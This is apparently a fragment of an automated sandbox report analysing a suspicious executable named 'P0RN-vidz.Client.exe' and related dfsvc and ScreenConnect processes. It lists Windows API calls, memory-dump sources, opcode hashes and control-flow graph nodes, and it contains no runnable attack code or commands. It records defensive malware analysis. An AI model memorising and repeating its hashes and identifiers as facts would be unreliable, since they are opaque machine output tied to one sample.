                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F0F
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F22
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F33
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 811eaa9f21495f286822b26e5c7efc5acdafd83058a3000ccfab54b6c3b1b6fc
                                                                                                                                                                                                                                          • Instruction ID: f14bb77a3eaf2c99b5c9c8cd075211620457b195f1c00dbf37addabf9da3cbd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 811eaa9f21495f286822b26e5c7efc5acdafd83058a3000ccfab54b6c3b1b6fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0DA788103209FD7236F18BC4555B3BACAB07720B664286FA1A5A271D7395942DFC1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\P0RN-vidz.Client.exe,00000104), ref: 003730E3
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003731AE
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003731B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\P0RN-vidz.Client.exe
                                                                                                                                                                                                                                          • API String ID: 2506810119-1362196275
                                                                                                                                                                                                                                          • Opcode ID: 5d28735f68ad51fa168facebdc9cd1b0749d2b996ccd3b9d9c942977b9fcf192
                                                                                                                                                                                                                                          • Instruction ID: 1592dac1d9207614b1e8e7c93ee28405b216b6059d9db5abf481aa1d2afcbdd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d28735f68ad51fa168facebdc9cd1b0749d2b996ccd3b9d9c942977b9fcf192
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6318375A00248AFDB33EB99DC819AEBBFCEB85310F108096F5089B211D7745B45EB51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003726E4,00000000,?,00381B54,?,?,?,00372887,00000004,InitializeCriticalSectionEx,0037BC48,InitializeCriticalSectionEx), ref: 00372740
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,003726E4,00000000,?,00381B54,?,?,?,00372887,00000004,InitializeCriticalSectionEx,0037BC48,InitializeCriticalSectionEx,00000000,?,00372617), ref: 0037274A
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00372772
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                          • Opcode ID: f20a32442fdc6f13185d217523cc1c4a797b7a2d8a6862d83cccafef3d5ede3d
                                                                                                                                                                                                                                          • Instruction ID: 2730131792847e07168471eff742fdce13ca4c0d53188a6fa70d7b667eadc7f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20a32442fdc6f13185d217523cc1c4a797b7a2d8a6862d83cccafef3d5ede3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E04F30280304FBEF322B70EC8AF5A7F68AB10B52F108424F90DA81E2D765E8949584
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue), ref: 0037595F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue,0037C4D8,FlsSetValue,00000000,00000364,?,00374646), ref: 0037596B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue,0037C4D8,FlsSetValue,00000000), ref: 00375979
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                          • Opcode ID: 3689092c2c80f4f800b252fd36a539314a6e8977a21ba6d80360599cd2b97eff
                                                                                                                                                                                                                                          • Instruction ID: 32220fc5bc5ba97ef8989489d4c212340e0c17dc070cc35b0609544379f88882
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3689092c2c80f4f800b252fd36a539314a6e8977a21ba6d80360599cd2b97eff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2701FC32615622EFCB374B68DC88B57B76C9F46771B214524FA1DD7140D764D844C6E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374B77
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: IsProcessorFeaturePresent.KERNEL32(00000017,0037488C,00000000,?,00000004,00000000,?,?,?,?,00374899,00000000,00000000,00000000,00000000,00000000), ref: 0037489F
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: GetCurrentProcess.KERNEL32(C0000417), ref: 003748C1
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: TerminateProcess.KERNEL32(00000000), ref: 003748C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                          • Instruction ID: aaff06797963dbbb5fdb29d9dcd4127590ed518678cdcc45abc931a115860667
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB51B475E00109AFDF26CFA8C881AADB7F9EF48314F258169E458E7301E739AE01CB50

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:16.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:516
                                                                                                                                                                                                                                          Total number of Limit Nodes:64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID: 6
                                                                                                                                                                                                                                          • API String ID: 1029625771-498629140
                                                                                                                                                                                                                                          • Opcode ID: 925ce319db0b7b81f762d347104fcc3a4960f633d9bd07d92ef2cc6e32f6611f
                                                                                                                                                                                                                                          • Instruction ID: d6bb90f11d98c0807c45c1ea801441b7074b60779efe287f88b6687f8bda0e6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 925ce319db0b7b81f762d347104fcc3a4960f633d9bd07d92ef2cc6e32f6611f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC813631E0CA895FE75AEB7C88596B93BE1FF56350F0841BAC40DC7292DF3898068751
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 930238652-0
                                                                                                                                                                                                                                          • Opcode ID: 36f7afe2272c4fd35e017050e878d723cc294fba3cb5e5d20370a9283f8e1947
                                                                                                                                                                                                                                          • Instruction ID: 06fd2cf6aa6a94002bf36144ff27fa2d1d234e55cb95847b637c5a041deb68f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f7afe2272c4fd35e017050e878d723cc294fba3cb5e5d20370a9283f8e1947
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3891C03090CB8D4FDBA9EF2888557E57BE1FF59311F04426ED84DC7292CB7499458B81
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020061344.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848d5d000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:12.8%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:11
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 11475 7ff848e6f66b 11476 7ff848e6f677 CreateFileW 11475->11476 11478 7ff848e6f7ac 11476->11478 11479 7ff848e68524 11481 7ff848e6852d 11479->11481 11480 7ff848e68592 11481->11480 11482 7ff848e68606 SetProcessMitigationPolicy 11481->11482 11483 7ff848e68662 11482->11483 11484 7ff848e63e22 11485 7ff848e7f3d0 CloseHandle 11484->11485 11487 7ff848e7f44b 11485->11487

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 624 7ff848e6f66b-7ff848e6f700 629 7ff848e6f70a-7ff848e6f7aa CreateFileW 624->629 630 7ff848e6f702-7ff848e6f707 624->630 632 7ff848e6f7ac 629->632 633 7ff848e6f7b2-7ff848e6f7e5 629->633 630->629 632->633
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 698 7ff848e63ed2-7ff848e685ff 700 7ff848e68606-7ff848e68660 SetProcessMitigationPolicy 698->700 701 7ff848e68668-7ff848e68697 700->701 702 7ff848e68662 700->702 702->701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 778 7ff848e63e22-7ff848e7f449 CloseHandle 781 7ff848e7f44b 778->781 782 7ff848e7f451-7ff848e7f47f 778->782 781->782
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq$
                                                                                                                                                                                                                                          • API String ID: 0-3867085953
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: a3bee7ba1db48c8b86c60c0c31700f2f92f5e15a29adfce221ad39b7eca438dd
                                                                                                                                                                                                                                          • Instruction ID: e3eb17de06f5cc6b9e08b8fd82cfe39587246d8263c73b7aed68a3cbf7f28781
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3bee7ba1db48c8b86c60c0c31700f2f92f5e15a29adfce221ad39b7eca438dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB710A34B106058FDB18DF69D8949AEBBB2FF8D314B1045A5E5069B375DB30EC02DB80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 548b576aa1f47f5e44f4c734ae6d713d3d9e95acf39fbd21acc4e6cccaad29f6
                                                                                                                                                                                                                                          • Instruction ID: 712701f92d61cac606a239465de323fdf3eb5e1d9cf36e67c6599f4861ce7031
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 548b576aa1f47f5e44f4c734ae6d713d3d9e95acf39fbd21acc4e6cccaad29f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65510030A002119FDB2A9F68D858B6EBBF2BF85714F108969E456DB3D5DB309C85CB81
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: 723a2137f11c02a9b75561ef39a0ff3fad4acf31482b9b2803975a90650e19bd
                                                                                                                                                                                                                                          • Instruction ID: 62df4712da7320b9f3c996b17abc498ff3edc9e6c9643be46683c8a2f60150d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723a2137f11c02a9b75561ef39a0ff3fad4acf31482b9b2803975a90650e19bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D41B230A00116CBCB19EF68E59466EFBB6EF84310B14C165D91AAB349DB34E906CB91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                          • Opcode ID: 1c9eedc19976ce51ffccd1d9de392e31c8422b89d2e5a10f61deae3ed75dd036
                                                                                                                                                                                                                                          • Instruction ID: efc0e92610e4f7713ecff5faa6def8786ece6142e8c3b1516f13445ac734d5da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c9eedc19976ce51ffccd1d9de392e31c8422b89d2e5a10f61deae3ed75dd036
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31D3317107515BC709AB7CA85095EBBEAFFC42A07008578D829DB348EF70DD058BD5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fb87c36a72676c2b18440ec2c664aa16f84868a599e1d549228d40a11918a561
                                                                                                                                                                                                                                          • Instruction ID: 34a56af5672d5482542a515eca24af66a14b6dee6d74efc70c1d0c3f0f63ef8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb87c36a72676c2b18440ec2c664aa16f84868a599e1d549228d40a11918a561
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69812331D093958FC706DF78D864AC9BFB1FF86300F15859AD040EB2A6E7789989CB61
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 377e89bed5ce83371d886676afe4d147ffab4dffc89ea2f54f491e327a4ec863
                                                                                                                                                                                                                                          • Instruction ID: d71b4c696efc348af7eee37eb76e85ac7c40089552e5b28ee602099c079061cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 377e89bed5ce83371d886676afe4d147ffab4dffc89ea2f54f491e327a4ec863
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51FA34600601CFC728DF29D894956BBF2FF8D324B144A6CD4979BBA4DB31E846CB44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4502e09abe88a56fe6dbd21c66176efdda4147584205242597cb4b1a6a66138b
                                                                                                                                                                                                                                          • Instruction ID: 95e618bb26bfc4483eec236a1c88dc05a3f2dd3587a33e5ff8308b436a3063f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4502e09abe88a56fe6dbd21c66176efdda4147584205242597cb4b1a6a66138b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B516D34E003099FDB15EFB8D854BDDBBB5FF89300F108569E514AB298EB74A985CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7c873ffc790b743e3b63755280c03a24a3625c7b6d428ae8490e6b5872277eb
                                                                                                                                                                                                                                          • Instruction ID: 2cde70eb85a4570bf6522f3dff7f8022b792f644767b774e3551fcd086ecafbc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c873ffc790b743e3b63755280c03a24a3625c7b6d428ae8490e6b5872277eb
